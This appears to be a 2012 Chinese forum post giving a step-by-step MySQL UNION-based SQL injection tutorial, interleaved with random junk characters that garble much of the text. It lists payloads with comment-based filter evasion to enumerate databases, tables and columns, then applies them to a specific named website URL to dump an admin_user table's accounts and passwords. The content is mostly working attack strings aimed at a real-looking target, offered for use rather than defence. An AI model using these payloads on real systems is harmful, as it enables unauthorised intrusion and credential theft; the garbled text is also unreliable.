查库
* K' [# T- u7 V
) ?7 l; v& e3 E3 O- x: jid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*! r& V! s+ n( J
% j S6 |( P1 ^* [7 D: U查表
8 C2 R }( g/ c5 H0 u. U+ |/ E" v; s) z! K2 B5 j
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
( h, D" y+ Z$ S$ |) p) } U5 ~( K5 m" B( A
查段1 q) a1 }! _! T& z' X8 @9 j
! M) r& R5 O3 A* e8 e, hid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1! t- Q8 N% K3 u: `) m; H% h
' v' K* g% Q \5 @3 a
X& W/ ?9 U1 l- y ]- \mysql5高级注入方法暴表# c' e1 S k5 y+ g4 Z Y
# u, H* R( h4 o4 z3 Q5 e: X7 E* `" Y例子如下:+ c! ]8 r* Y9 U2 V8 _/ i, P% v
) D! r$ ~5 h a6 H+ c& { i1.爆表$ }% B, J/ H2 R P; h3 ?
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)4 M" w( T; e2 ]" H
这样爆到第4个时出现了admin_user表。1 s* d8 y x& k3 g
$ M! e. F6 M) p+ |
2.暴字段
$ l- J. {/ m" f9 a: Chttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
2 O* K& N' n8 ~8 q( m, f
4 {1 J# Z$ n z7 y8 A# J O4 ^4 P" f- l
3.爆密码( F% _1 {$ q- o1 H @5 m, N
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* 2 d* J+ G1 _& u j7 f
8 ~1 d2 p7 M* c7 d1 B/ d4 c9 z
6 X, Q, N( i# h; {: ] |
发表于 2012-9-13 16:29:37
收藏
支持
反对